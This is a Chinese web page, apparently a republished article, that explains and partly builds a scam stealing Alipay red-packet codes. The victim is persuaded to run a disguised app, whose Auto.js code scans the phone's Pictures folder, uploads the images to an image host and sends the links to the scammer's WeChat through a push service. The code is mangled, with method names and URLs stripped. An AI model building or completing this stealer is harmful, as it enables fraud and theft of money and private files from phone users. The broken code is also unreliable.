✅ 操作成功!

支付宝ar红包

发布时间:2023-06-07 作者:admin 来源:文学

支付宝ar红包

支付宝ar红包

-

2023年2月19日发(作者:)

盗刷⽀付宝⼝令新骗局(讲解与制作)

盗取⽀付宝⼝令红包,本⽂详细解释原理与制作过程

不要⽤于⾮法⽤途,微信推送接⼝,图床访问⽇志,⽀付宝收款等都可以找到你,⽹络不是法外之地

原理

骗⼦会让你发⼀个⽀付宝⼝令红包,说是来证明你有钱,等交易完成之后你再把⼝令给他,等你发了红包,这时候看似正常⽽⼜良⼼的商家会给你发⼀个软件,软件可能是某某游戏外

挂,suo机⽣成器,甚⾄是⾊情软件,等你打开软件的那⼀刻,骗⼦也会收到⼀条名为“鱼咬勾了”的信息,你的⼝令就在那⾥⾯。

⼤佬看到这⾥就可以退出了,全⽂没有什么技术难点

思路

思路很简单,接下来⼀步⼀步实现

开始制作

语⾔选⽤autojs,⽤这个写简单

遍历指定⽬录

⽀付宝发送⼝令红包的时候会⾃动⽣成图⽚并保存到/storage/emulated/0/Pictures中,但是为了代码以后升级与扩展,我还是决定把路径以参数的形式传进去

代码实现:

functiongetFilesFromPath(path){

/*格式:getFilesFromPath(⽂件夹路径)*/

/*解释:获取⽂件夹所有⽂件和⽂件夹递归遍历返回⽂件路径数组*/

vararrDir=newArray();

vararrFile=newArray();

try{

varrp=/^([/][^:*?|]+[/]?)+$/;

if((path)==false)throw\"⾮法⽂件路径,esFromPath(?);\"+path;

}catch(err){

log(err);

exit();

}

/*获取path⽬录下所有⽂件夹和⽂件*/

vararr=r(path);

/*遍历⽂件和⽂件夹*/

for(vari=0;i<;i++){

/*连接路径*/

newPath=(path,arr[i]);

/*判断路径类型*/

if((newPath)){

//(newPath);

/*递归遍历⽂件夹*/

//vararrF=getFilesFromPath(newPath);

//arrDir=(arrF);

//注释这⼏⾏是递归遍历所有⽂件的,这⾥不需要,所以注释

}elseif((newPath)){

(newPath);

}

}

/*按字母升序排序数组*/

();

();

/*连接数组并返回*/

(arrFile);

}

正则筛选图⽚

这个其实是可以写⼊到上⼀个函数⾥⾯的,但是,⼀个函数⼀个功能,不能混,不然过⼏天我就看不懂⾃⼰的代码了

代码实现:

functionimgPatt(arrdizhi){

varimgarr=[]

for(j=0;j<;j++){//遍历所有的⽂件

if(arrdizhi[j].search(/^.*?[.](bmp|jpg|gif|jpeg)/i)==false){//判断是否是图⽚,如果是就写⼊到数组中

imgarr[]=arrdizhi[j];

}

}

returnimgarr;

}

上传图床

这⼀步其实是可以上传到⾃⼰服务器的,但是考虑到安全性,还是上传到图床⽐较稳

代码实现(上传):

functionupImg(path){

varurl=\"/pic/upload_\";

varres=ltipart(url,{

\"file\":open(path),

});

();

}

由于上传的不是⼀张图⽚,所以还得写个循环:

functionarrUp(arrimg){

vararrurl_f=[]

for(i=0;i<;i++){

arrurl_f[arrurl_]=upImg(arrimg[i])

}

returnarrurl_f;

}

推送到微信

这⾥⽤的是Server酱的接⼝,⽤别的接⼝⾃⼰写吧(注意,我这⾥是把结果弄成md的形式上传的,这样微信收到的就可以直接看到,不需要再转到浏览器了)

代码实现:

functionweChat(arrstr){

varmd;

for(i=0;i<;i++){

md+=\"![](\"+arrstr[i]+\")n\";

}

varapi=\"/?text=鱼咬勾了&desp=\";

varjson_api=(api+md).();

returnjson_api;

}

⾄此,核⼼代码就已经写完了,往下我也不写了,再写就是帮助你犯罪了

👁️ 阅读量:0